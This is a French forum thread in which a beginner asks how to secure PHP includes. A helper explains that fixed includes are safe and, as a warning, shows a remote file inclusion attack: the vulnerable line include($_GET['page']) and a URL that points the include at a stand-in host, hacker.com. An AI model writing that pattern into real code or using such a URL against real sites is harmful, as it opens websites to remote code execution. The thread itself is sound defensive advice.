A voir également:
- Extension php3 securise include ?
- Mode sécurisé samsung - Guide
- Extension dat - Guide
- Changer extension fichier - Guide
- Extension .bin - Guide
- Extension 7z - Guide
7 réponses
pyschopathe
Messages postés
1974
Date d'inscription
dimanche 2 mars 2008
Statut
Membre
Dernière intervention
22 mars 2010
135
24 août 2008 à 15:29
24 août 2008 à 15:29
Non, changer l'extension ne sécurisera pas les include ! Et pourquoi php3 ? Que cherchez-vous à faire ?
bah tout simplement
pour securiser cette include :
<?php
include("news-accueil.php");
?>
j'ai mis
<?php
if ($_GET['news-accueil.php'] == "news-accueil.php")
{
include("news-accueil.php");
}
?>
mais ça ne fonctionne pas !
donc on ma conseiller dutiliser l'extension php3
pour securiser cette include :
<?php
include("news-accueil.php");
?>
j'ai mis
<?php
if ($_GET['news-accueil.php'] == "news-accueil.php")
{
include("news-accueil.php");
}
?>
mais ça ne fonctionne pas !
donc on ma conseiller dutiliser l'extension php3
pyschopathe
Messages postés
1974
Date d'inscription
dimanche 2 mars 2008
Statut
Membre
Dernière intervention
22 mars 2010
135
24 août 2008 à 15:32
24 août 2008 à 15:32
Est-ce que news_accueil.php est le nom de la variable passée en paramètre dans l'URL ? L'extension php3 ne serrvira à rien, qui vous a conseillé ça ?
euh je ne comprend pas ce que vous voulais dire par passer en url je vous explique ma page :
dans la page d'accueil j'ai :
<?php
include("haut-accueil.php");
?>
mon texte
<?php
include("bas.php");
?>
et dans haut-accueil j'ai :
texte modifiable ...
<?php
include("news-accueil.php");
?>
et voila ça constitue ma page d'accueil et j'aimerais que mes include sois sécuriser mais je ne comprend pas ce que vous voulez dire par "le nom de la variable passée en paramètre dans l'URL"
Merci à vous de m'aider
dans la page d'accueil j'ai :
<?php
include("haut-accueil.php");
?>
mon texte
<?php
include("bas.php");
?>
et dans haut-accueil j'ai :
texte modifiable ...
<?php
include("news-accueil.php");
?>
et voila ça constitue ma page d'accueil et j'aimerais que mes include sois sécuriser mais je ne comprend pas ce que vous voulez dire par "le nom de la variable passée en paramètre dans l'URL"
Merci à vous de m'aider
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
pyschopathe
Messages postés
1974
Date d'inscription
dimanche 2 mars 2008
Statut
Membre
Dernière intervention
22 mars 2010
135
24 août 2008 à 15:50
24 août 2008 à 15:50
La variable $_GET est utilisée pour récupérer les paramètres passés dans l'URL, via un formulaire par exemple, du genre :
où var1 et var2 sont les noms des variables et val1 et val2 les valeurs.
Donc $_GET['var1'] = val1.
Cependant vos include ne changeront pas dynamiquement (c'est-à-dire qu'à chaque fois que la page sera affichée, les mêmes include auront été effectués). Il n'y a donc pas besoin de sécuriser ça, le seul moyen de pirater serait de hacker le serveur et dans ce cas, même la sécurisation if / include ne servirait à rien !
Le danger viendrait d'un site où on passe la page à inclure par l'URL :
puis
car l'adresse pourrait être modifiée en :
ce qui serait une énorme faille en matière de sécurité !
En gros, pas de soucis à vous faire tant que vous utilisez les include comme vous le faites.
Dites-moi si j'ai été assez clair.
http://mon.site.fr/mapage.html?var1=val1&var2=val2
où var1 et var2 sont les noms des variables et val1 et val2 les valeurs.
Donc $_GET['var1'] = val1.
Cependant vos include ne changeront pas dynamiquement (c'est-à-dire qu'à chaque fois que la page sera affichée, les mêmes include auront été effectués). Il n'y a donc pas besoin de sécuriser ça, le seul moyen de pirater serait de hacker le serveur et dans ce cas, même la sécurisation if / include ne servirait à rien !
Le danger viendrait d'un site où on passe la page à inclure par l'URL :
http://mon.site.fr/mapage.html?page=news.php
puis
include( $_GET['page'] );
car l'adresse pourrait être modifiée en :
http://mon.site.fr/mapage.html?page=http://hacker.com/mapage.php
ce qui serait une énorme faille en matière de sécurité !
En gros, pas de soucis à vous faire tant que vous utilisez les include comme vous le faites.
Dites-moi si j'ai été assez clair.
Ok merci beaucoup de votre aide !!
ceci est parfaitement claire !!
donc pour l'instant je n'ai pas de soucis a me faire quand a la sécurité de mon site via les includes ?
Merci de l'info !!!
ceci est parfaitement claire !!
donc pour l'instant je n'ai pas de soucis a me faire quand a la sécurité de mon site via les includes ?
Merci de l'info !!!
pyschopathe
Messages postés
1974
Date d'inscription
dimanche 2 mars 2008
Statut
Membre
Dernière intervention
22 mars 2010
135
25 août 2008 à 01:32
25 août 2008 à 01:32
Non, pour cette utilisation pas de danger, content d'avoir pu aider !
Mettez le sujet en résolu svp ;p
Mettez le sujet en résolu svp ;p